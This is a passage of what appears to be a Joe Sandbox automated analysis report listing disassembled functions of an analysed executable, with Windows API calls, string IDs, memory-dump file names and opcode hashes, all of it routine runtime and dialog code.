                                                                          • Opcode Fuzzy Hash: 3d270bfddb83c544162fc7c6deca2b54a2f8945b00eb949ddb9690125ffe8c77
                                                                          • Instruction Fuzzy Hash: C631E87950834AABC704DFA8C88499BB7F9BF98714F044A1EF995C3210E734D549CBA6
                                                                          Function 00F22AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00F22AF1,00F202FC,00F1FA34), ref: 00F22B08
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F22B16
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F22B2F
                                                                          • SetLastError.KERNEL32(00000000,00F22AF1,00F202FC,00F1FA34), ref: 00F22B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: a6c1f1140eac1b68793808f6e99f21507ebeddf2d8f3e7138b83c9d12d0a02a5
                                                                          • Instruction ID: 4d58cb9e274f27432f18f4d8c56ded86d645ac2b2790f239ff88b9d603289f9e
                                                                          • Opcode Fuzzy Hash: a6c1f1140eac1b68793808f6e99f21507ebeddf2d8f3e7138b83c9d12d0a02a5
                                                                          • Instruction Fuzzy Hash: 4101F7735093397EA6542B747C85A273B5AEF917747A0073AF120550F0EF194D00B154
                                                                          Function 00F297E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00F41030,00F24674,00F41030,?,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F297E9
                                                                          • _free.LIBCMT ref: 00F2981C
                                                                          • _free.LIBCMT ref: 00F29844
                                                                          • SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F29851
                                                                          • SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F2985D
                                                                          • _abort.LIBCMT ref: 00F29863
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$_free$_abort
                                                                          • String ID:
                                                                          • API String ID: 3160817290-0
                                                                          • Opcode ID: 5ea2efe900e9febb0dfeb00dc0134b3a164ea318d49572fac91d637e788ea66a
                                                                          • Instruction ID: 4bafadb22aca131d1edba9a77c5bf8708e90d450e6247c6625d6649f86b6d099
                                                                          • Opcode Fuzzy Hash: 5ea2efe900e9febb0dfeb00dc0134b3a164ea318d49572fac91d637e788ea66a
                                                                          • Instruction Fuzzy Hash: C9F02836508A3167C7123334BC0AB9B3A669FD2770F690028F624931D2EEB8C807B125
                                                                          Function 00F1DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F1DC47
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1DC61
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1DC72
                                                                          • TranslateMessage.USER32(?), ref: 00F1DC7C
                                                                          • DispatchMessageW.USER32(?), ref: 00F1DC86
                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F1DC91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 2148572870-0
                                                                          • Opcode ID: 012edc43fd1c4827ae1ed6f927953491ae4d694d6a7842ddec65610c595f638b
                                                                          • Instruction ID: c7649d0788a674d0e38982dbc161d4cf0580cf5646f154e78ae618a862572d31
                                                                          • Opcode Fuzzy Hash: 012edc43fd1c4827ae1ed6f927953491ae4d694d6a7842ddec65610c595f638b
                                                                          • Instruction Fuzzy Hash: CCF03C72E0121DBBCB20ABA5DC4CDCB7F7DEF427A5B004511F51AD2050D675868ADBE0
                                                                          Function 00F0C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F105DA: _wcslen.LIBCMT ref: 00F105E0
                                                                            • Part of subcall function 00F0B92D: _wcsrchr.LIBVCRUNTIME ref: 00F0B944
                                                                          • _wcslen.LIBCMT ref: 00F0C197
                                                                          • _wcslen.LIBCMT ref: 00F0C1DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcsrchr
                                                                          • String ID: .exe$.rar$.sfx
                                                                          • API String ID: 3513545583-31770016
                                                                          • Opcode ID: 53289117c9c12b1a25aeb631fb2f7f269b01fd42705bd569ac062d7342860b28
                                                                          • Instruction ID: f0f146fb5fd18631099502d82255be8f4347076712bca64e583baaf01d7789b1
                                                                          • Opcode Fuzzy Hash: 53289117c9c12b1a25aeb631fb2f7f269b01fd42705bd569ac062d7342860b28
                                                                          • Instruction Fuzzy Hash: 74411622A44311E5C731AF748C42A7AB3A8EF41764F144A0EF9C1AB5C1EBA48DC2F3D5
                                                                          Function 00F1CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 00F1CE9D
                                                                            • Part of subcall function 00F0B690: _wcslen.LIBCMT ref: 00F0B696
                                                                          • _swprintf.LIBCMT ref: 00F1CED1
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • SetDlgItemTextW.USER32(?,00000066,00F4946A), ref: 00F1CEF1
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1CFFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                          • String ID: %s%s%u
                                                                          • API String ID: 110358324-1360425832
                                                                          • Opcode ID: b1fd92c4d5119cc2befc8094aeb34e05fb26b5f733467c4ee6fb52ec0fb01439
                                                                          • Instruction ID: 091fba1408319c869f7d7ad490677fbc0cd38b96fb027933c00da46aed0da8af
                                                                          • Opcode Fuzzy Hash: b1fd92c4d5119cc2befc8094aeb34e05fb26b5f733467c4ee6fb52ec0fb01439
                                                                          • Instruction Fuzzy Hash: 0941B571940618AADF20DB90CC41FEE77BCEB05310F4080A6F909E7191EEB58A85EFB1
                                                                          Function 00F0BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00F0BB27
                                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00F0A275,?,?,00000800,?,00F0A23A,?,00F0755C), ref: 00F0BBC5
                                                                          • _wcslen.LIBCMT ref: 00F0BC3B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$CurrentDirectory
                                                                          • String ID: UNC$\\?\
                                                                          • API String ID: 3341907918-253988292
                                                                          • Opcode ID: d0ed9337fd440ab831d850e355b5c6b774513f124ee43a262e7e5a3f078f7ede
                                                                          • Instruction ID: 57027c8370e4d2061c840ee8a75fc9084500853a3b3d463b53a9ad98c64a6fd7
                                                                          • Opcode Fuzzy Hash: d0ed9337fd440ab831d850e355b5c6b774513f124ee43a262e7e5a3f078f7ede
                                                                          • Instruction Fuzzy Hash: 6341A471840216A6EF21AF60CC41EEE77A9AF453A0F148465F855A3291DFB8DED0FB60
                                                                          Function 00F1B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadBitmapW.USER32(00000065), ref: 00F1B6ED
                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00F1B712
                                                                          • DeleteObject.GDI32(00000000), ref: 00F1B744
                                                                          • DeleteObject.GDI32(00000000), ref: 00F1B767
                                                                            • Part of subcall function 00F1A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F1B73D,00000066), ref: 00F1A6D5
                                                                            • Part of subcall function 00F1A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A6EC
                                                                            • Part of subcall function 00F1A6C2: LoadResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A703
                                                                            • Part of subcall function 00F1A6C2: LockResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A712
                                                                            • Part of subcall function 00F1A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00F1B73D,00000066), ref: 00F1A72D
                                                                            • Part of subcall function 00F1A6C2: GlobalLock.KERNEL32(00000000), ref: 00F1A73E
                                                                            • Part of subcall function 00F1A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F1A762
                                                                            • Part of subcall function 00F1A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F1A7A7
                                                                            • Part of subcall function 00F1A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00F1A7C6
                                                                            • Part of subcall function 00F1A6C2: GlobalFree.KERNEL32(00000000), ref: 00F1A7CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                          • String ID: ]
                                                                          • API String ID: 1797374341-3352871620
                                                                          • Opcode ID: 643a34a9f24909e9d7a4465d762a5308c991e6897b98bd7cb4ee836f3a3499aa
                                                                          • Instruction ID: 9ccf34bd7c03d373e485630b20128c3ff6cdd7c0948ef0ac7b8e00d68a903fe8
                                                                          • Opcode Fuzzy Hash: 643a34a9f24909e9d7a4465d762a5308c991e6897b98bd7cb4ee836f3a3499aa
                                                                          • Instruction Fuzzy Hash: 55012236900205B7C71277748D09AFF7ABAAFC0B62F080010FD10A72D1DF768D8972A1
                                                                          Function 00F1D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1D64B
                                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F1D661
                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F1D675
                                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 00F1D684
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemText$DialogWindow
                                                                          • String ID: RENAMEDLG
                                                                          • API String ID: 445417207-3299779563
                                                                          • Opcode ID: 049900e1c0448d6a71faf2dd972e77a46d948fb3aacc3b00fffe50b9f4b5ca0e
                                                                          • Instruction ID: 4d3c7b3a295eb28f195cfc3f792e0f91e936868b7fcd188d956c5df84ae411b5
                                                                          • Opcode Fuzzy Hash: 049900e1c0448d6a71faf2dd972e77a46d948fb3aacc3b00fffe50b9f4b5ca0e
                                                                          • Instruction Fuzzy Hash: AA01FC33A44318BBD2114F659D09F9B777DEBABB12F110411F306A20D1C7E29A48BB76
                                                                          Function 00F27E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F27E24,00000000,?,00F27DC4,00000000,00F3C300,0000000C,00F27F1B,00000000,00000002), ref: 00F27E93
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F27EA6
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00F27E24,00000000,?,00F27DC4,00000000,00F3C300,0000000C,00F27F1B,00000000,00000002), ref: 00F27EC9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: a1d2b426435254f2a8801f090f100445f75cb966a5feca7b811ce274ffa9f25a
                                                                          • Instruction ID: 7d1b3b286c2e69fb202b0cc09b8fc6b25dfa55ca4fc831817bcd2dd18288bea6
                                                                          • Opcode Fuzzy Hash: a1d2b426435254f2a8801f090f100445f75cb966a5feca7b811ce274ffa9f25a
                                                                          • Instruction Fuzzy Hash: 35F06831E0461CBBCB15DFA4DC09B9EBFB5EF44725F0180A9F805E2260DB349E44EAA1
                                                                          Function 00F0F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F10836
                                                                            • Part of subcall function 00F1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0F2D8,Crypt32.dll,00000000,00F0F35C,?,?,00F0F33E,?,?,?), ref: 00F10858
                                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F0F2E4
                                                                          • GetProcAddress.KERNEL32(00F481C8,CryptUnprotectMemory), ref: 00F0F2F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                          • API String ID: 2141747552-1753850145
                                                                          • Opcode ID: d0f6b11c94d71dda8e5e1c141b43bf5603229268cb8469b3654767ada3188269
                                                                          • Instruction ID: e784d41f2e1fdb3d012802a9ebcec3ae02a7ff38c6c13e90fb33134798786f38
                                                                          • Opcode Fuzzy Hash: d0f6b11c94d71dda8e5e1c141b43bf5603229268cb8469b3654767ada3188269
                                                                          • Instruction Fuzzy Hash: 70E046B4910706AECB30DF789949B42BAD46F04734F14882DE0DAE3A94DABCE584BB51
                                                                          Function 00F22BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer$_abort
                                                                          • String ID:
                                                                          • API String ID: 2252061734-0
                                                                          • Opcode ID: 088e2150006c5d3e39fe8212793e13e5d6c371271ab74a0a707c82dd4ccaa471
                                                                          • Instruction ID: e439bbb5d0ba35196c17a41e88e8f446609f50304d0a72d8a353df80c1729e7e
                                                                          • Opcode Fuzzy Hash: 088e2150006c5d3e39fe8212793e13e5d6c371271ab74a0a707c82dd4ccaa471
                                                                          • Instruction Fuzzy Hash: A251D172A00222BFDB698F14F845BAAB3A4FF54320F64412DEC05576A1D775ED80FB90
                                                                          Function 00F2BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00F2BF39
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F2BF5C
                                                                            • Part of subcall function 00F28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F2BF82
                                                                          • _free.LIBCMT ref: 00F2BF95
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F2BFA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                          • String ID:
                                                                          • API String ID: 336800556-0
                                                                          • Opcode ID: 9800ef3ce7ebb34edecca0555573fe5645c1d20219242960915e36702113266a
                                                                          • Instruction ID: 454c4867306ccac21df8513a78cbf6cc510d57897d15bdaf8321a0bef5418830
                                                                          • Opcode Fuzzy Hash: 9800ef3ce7ebb34edecca0555573fe5645c1d20219242960915e36702113266a
                                                                          • Instruction Fuzzy Hash: C601B162A02A267F232166B67D49C7B7B6DDEC2BB13150129FD04C2105EF648D02B5B0
                                                                          Function 00F29869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00F291AD,00F2B188,?,00F29813,00000001,00000364,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F2986E
                                                                          • _free.LIBCMT ref: 00F298A3
                                                                          • _free.LIBCMT ref: 00F298CA
                                                                          • SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F298D7
                                                                          • SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F298E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$_free
                                                                          • String ID:
                                                                          • API String ID: 3170660625-0
                                                                          • Opcode ID: 9561825deedd86b63efd9f14b5c2eafcd73d0a2ab6cea4e4002f4f0d72b8ee82
                                                                          • Instruction ID: 737ba87e8b305b6cdfb9b67109273a2e3bb685eaa1f7a761b0c4ba980daa91fa
